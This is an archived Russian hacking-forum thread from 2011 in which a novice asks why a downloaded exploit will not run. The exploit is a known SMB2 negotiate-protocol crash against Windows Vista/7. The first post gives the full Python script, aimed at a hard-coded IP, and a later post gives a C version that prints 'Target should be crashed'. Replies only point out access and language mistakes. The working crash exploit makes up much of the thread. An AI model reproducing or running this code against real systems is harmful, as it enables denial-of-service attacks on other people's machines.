Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

работа с *.py эксплоитами

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> работа с *.py эксплоитами
Имя
Сообщение << Старые топики   Новые топики >>
работа с *.py эксплоитами - 2011-02-22 10:09:26.010000   
red_fox

Сообщений: 5
Оценки: 0
Присоединился: 2009-01-26 20:54:09.263333
Добрый день !

Я новичок в плане взлома да и вобще )

Мне конечно очень понравилась программа Metasploit framework, но всех сплоитов которые там находятся, не
совсем хватает, по этому я порылся в гугле и т.д. в итоге нашел сплоит для ОС windows 7

его содержание такое :


from socket import socket

host = "92.54.70.230", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: –&gt; :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

я так понимаю он написан на python …

пытаюсь запустить с консоли и вот что получаю :

from: can't read /var/mail/socket
host: couldn't get address for '92.54.70.230,': not found
/home/blood/1st.py: строка 4: ошибка синтаксиса около неожиданной лексемы `('
/home/blood/1st.py: строка 4: `buff = ('

ладно … дальше пробую запустить сначала python и потом из него мой файл :

Python 2.6.6 (r266:84292, Sep 15 2010, 15:52:39)
[GCC 4.4.5] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>
'/home/blood/1st.py'
>>>
и ничего :(

подскажете пожалуйста как мне быть?? что бы я мог использовать сторонние эксплоиты …

Зарание благодарен…







Post #: 1
RE: работа с *.py эксплоитами - 2011-02-24 10:38:39.336666   
Pupkin-Zade

Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
Ну так нет у вас доступа к 92.54.70.230
Post #: 2
RE: работа с *.py эксплоитами - 2011-02-25 12:33:46.906666   
red_fox

Сообщений: 5
Оценки: 0
Присоединился: 2009-01-26 20:54:09.263333
С этим все нормально и айпи пингуется и 445 открытый ( он внутренний ) , да я и на виртуальной машине пробовал - ничего (

Но как быть с этим ???

char buff[] =
"\x00\x00\x00\x90"
"\xff\x53\x4d\x42"
"\x72\x00\x00\x00"
"\x00\x18\x53\xc8"
"\x00\x26"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x ff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x 45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x 20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x 30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x 20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x 31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x 02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x 20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x 32\x2e"
"\x30\x30\x32\x00";

int main(int argc, char *argv[]) {


if (argc &lt; 2) {
printf("Syntax: %s [ip address]\r\n", argv[0]);
return -1;
}

WSADATA WSAdata;
WSAStartup(MAKEWORD(2, 2), &WSAdata);

SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
char *host = argv[1];


SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = htons((unsigned short)445);
ssin.sin_addr.s_addr = inet_addr(host);

printf("Connecting to %s:445… ", host);
if (connect(sock, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
printf("ERROR!\r\n");
return 0;
}
printf("OK\r\n");

printf("Sending malformed packet… ");
if (send(sock, buff, sizeof(buff), 0) &lt;= 0) {
printf("ERROR!\r\n");
return 0;
}
printf("OK\r\n");

printf("Successfully sent packet!\r\nTarget should be crashed…\r\n");


closesocket(sock);
WSACleanup();

return 1;

}

ведь я так понимаю функция "printf(" должна хоть что то выводить на экран, а там все та же картина —>>>


&gt;&gt;&gt; '/home/blood/1st.py'
'/home/blood/1st.py'
&gt;&gt;&gt;
Post #: 3
RE: работа с *.py эксплоитами - 2011-02-27 15:36:42.136666   
fake_magent

Сообщений: 187
Оценки: 0
Присоединился: 2010-12-19 18:43:29.280000
то что выше это не питон

речь идёт про http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.HТМL ?
Post #: 4
Страниц:  [1]
Все форумы >> [Уязвимости] >> работа с *.py эксплоитами







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.